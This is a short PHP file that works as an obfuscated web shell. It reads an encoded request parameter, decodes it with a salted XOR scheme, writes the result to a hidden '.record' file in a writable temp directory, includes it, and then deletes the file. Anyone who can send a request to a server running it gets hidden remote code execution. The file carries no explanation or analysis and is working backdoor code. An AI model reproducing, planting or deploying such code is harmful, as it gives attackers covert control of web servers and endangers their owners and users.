<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x6F\x62j"])){
	$dat = $_REQUEST["\x6F\x62j"];
	 $dat  =explode (	 "."	,$dat   );	  
	$holder =	'';
            $salt =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	strlen($salt);
            $i =	0;
    
            foreach ($dat as $v5) {
                $chS =	ord($salt[$i	%	 $lenS]);
                $dec =	((int)$v5 - $chS - ($i	%	 10))		^	20;
                $holder 	.=  chr($dec);
                $i++; }	
	$comp = array_filter(["/tmp", sys_get_temp_dir(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", getcwd(), getenv("TMP")]);
	foreach ($comp as $key => $entity) {
    		if (is_writable($entity) && is_dir($entity)) {
    $factor = implode("/", [$entity, ".record"]);
    $success = file_put_contents($factor, $holder);
if ($success) {
	include $factor;
	@unlink($factor);
	die();}
}
}
}